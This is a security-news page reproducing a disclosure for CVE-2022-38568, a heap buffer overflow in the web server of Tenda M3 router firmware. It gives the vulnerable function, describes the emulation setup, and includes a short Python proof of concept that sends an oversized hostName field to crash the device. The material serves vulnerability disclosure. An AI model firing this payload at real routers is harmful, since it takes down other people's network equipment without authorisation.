Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2022-38568: Vuln/Tenda M3/formSetFixTools_hostname at main · xxy1126/Vuln

Tenda M3 V1.0.0.12(4856) was discovered to contain a heap buffer overflow vulnerability in the function formSetFixTools. This vulnerability allows attackers to cause a Denial of Service (DoS) via the hostname parameter.

CVE
#vulnerability#web#dos#perl#buffer_overflow

Tenda M3 contains heap Overflow Vulnerability****overview

  • type: heap overflow vulnerability

  • supplier: Tenda https://www.tenda.com

  • product: TendaM3 https://www.tenda.com.cn/product/M3.html

  • firmware download: https://www.tenda.com.cn/download/detail-3133.html

  • affect version: TendaM3 v1.0.0.12(4856)

Description****1. Vulnerability Details

the httpd in directory /bin has a heap buffer overflow. The vunlerability is in fucntion formSetFixTools

It calls malloc(0x28Cu) to allocate heap buffer, and it copies POST parameterhostname tp heap buffer.

If v3 > 0x50, that will cause heap overflow due to strncpy(v1, v2, c3)

2. Recurring loopholes and POC

use qemu-arm-static to run the httpd, we need to patch it before run.

  • in main function, The ConnectCfm function didn’t work properly, so I patched it to NOP
  • The R7WebsSecurityHandler function is used for permission control, and I’ve modified it to access URLs that can only be accessed after login

poc of DOS(deny of service)

import requests

data = { "networkTool": "1", "hostName": "a"*0x100 } cookies = { "user": “admin” } res = requests.post("http://127.0.0.1/goform/setFixTools", data=data, cookies=cookies) print(res.content)

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE-2023-6905
CVE-2023-6903
CVE-2023-6904
CVE-2023-3907